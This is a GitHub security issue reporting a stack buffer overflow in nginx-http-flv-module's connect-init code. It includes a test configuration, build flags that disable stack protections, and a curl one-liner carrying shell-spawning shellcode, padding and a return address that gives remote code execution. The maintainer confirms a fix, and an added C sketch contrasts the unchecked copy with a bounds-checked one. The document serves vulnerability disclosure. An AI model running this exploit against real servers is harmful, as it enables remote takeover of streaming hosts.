winshining / nginx-http-flv-module

A media streaming server based on nginx-rtmp-module. In addtion to the features nginx-rtmp-module provides, HTTP-FLV, GOP cache, VHosts (one IP for multi domain names) and JSON style statistics are supported now.
BSD 2-Clause "Simplified" License

[security] Potential stack overflow in `ngx_http_flv_live_connect_init` #170

Closed wupco closed 4 years ago

wupco commented 4 years ago

Vulnerability location

ngx_memcpy(name, stream->data, stream->len);

`name` is declared as `u_char name[NGX_RTMP_MAX_NAME];` (with `#define NGX_RTMP_MAX_NAME 256`). If `stream` is longer than 256 bytes, the copy overflows the stack.

Configuration file

worker_processes  1;

error_log  logs/error.log debug;

events {
    worker_connections  1024;
}

rtmp {
    publish_notify on;
    server {
        listen 1935;
        on_connect http://127.0.0.1:8080/connect;
        application live {
            live on;
        }

        application pppo {
            live on;
        }
    }
}

http {
    server {
        listen      8080;

        location /live {
            flv_live on;
        }
        location /connect {
            return 302 pppo;
        }

    }
}

Steps to reproduce the behavior

Compiled with the protection mechanisms disabled, this allows remote arbitrary command execution.

cd /src/nginx/; \
    ./auto/configure \
        --user=www-data \
        --group=www-data \
        --add-module=/src/nginx-http-flv-module \
        --with-cc-opt="-fno-stack-protector -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=0" \
        --with-ld-opt="-z norelro -no-pie -z execstack" \
        --with-threads \
        --with-http_ssl_module; \
    make; \
    make install;

exploit (shellcode+padding+addr([jmp rsi]))

 echo -e "http://127.0.0.1:8080/live\?app\=live\&stream\=j\xff_H\x89\xe6jAH\xff\xc7j4XH\x89\xe2\x0f\x05\x85\xc0u\xf1H\x89\xfdj\x03^H\xff\xcex\x0bVj\!XH\x89\xef\x0f\x05\xeb\xefjhH\xb8/bin///sPH\x89\xe7hri\x01\x01\x814$\x01\x01\x01\x011\xf6Vj\x08^H\x01\xe6VH\x89\xe61\xd2j;X\x0f\x05CCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLLL\x9d\x8e\x42" | xargs curl -vv

With the protection mechanisms left enabled, it results in a DoS vulnerability.
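Added example (not the module's code and not part of the report): a stand-alone C sketch of the unbounded copy described above beside a length-checked form. `str_t`, `connect_init_unchecked`, `connect_init_checked` and `check_name_of_length` are stand-ins invented for this snippet; the 256-byte limit is the NGX_RTMP_MAX_NAME value quoted in the report.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Limit quoted in the report (the module takes it from its ngx_rtmp.h). */
#define NGX_RTMP_MAX_NAME 256

typedef unsigned char u_char;
/* Stand-in for nginx's ngx_str_t: a length plus a pointer, not NUL-terminated. */
typedef struct { size_t len; u_char *data; } str_t;

/* Pattern from the report: the request-controlled stream name is copied into a
 * fixed stack buffer with no length check, so a name longer than
 * NGX_RTMP_MAX_NAME bytes overwrites the stack. Shown for contrast only. */
void connect_init_unchecked(const str_t *stream)
{
    u_char name[NGX_RTMP_MAX_NAME];
    memcpy(name, stream->data, stream->len);   /* no bound: stack overflow */
}

/* Hardened form: validate the length before copying and leave room for a NUL.
 * Returns the number of bytes copied, or -1 if the request must be rejected. */
static int connect_init_checked(const str_t *stream)
{
    u_char name[NGX_RTMP_MAX_NAME];
    if (stream->data == NULL || stream->len >= sizeof(name)) {
        return -1;                               /* too long: refuse, do not copy */
    }
    memcpy(name, stream->data, stream->len);
    name[stream->len] = '\0';
    return (int) stream->len;
}

/* Builds a constructed stream name of `len` bytes (capped at the scratch size)
 * and runs it through the checked initializer. */
int check_name_of_length(size_t len)
{
    static u_char scratch[1024];
    if (len > sizeof(scratch)) len = sizeof(scratch);
    memset(scratch, 'A', len);
    str_t stream = { len, scratch };
    return connect_init_checked(&stream);
}

int main(void)
{
    printf("255 bytes -> %d\n", check_name_of_length(255));   /* 255: accepted */
    printf("256 bytes -> %d\n", check_name_of_length(256));   /* -1: rejected */
    return 0;
}
```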

winshining commented 4 years ago

@wupco Many thanks for pointing out the problem. The bug has been fixed, and two other places that could have the same issue were fixed along with it.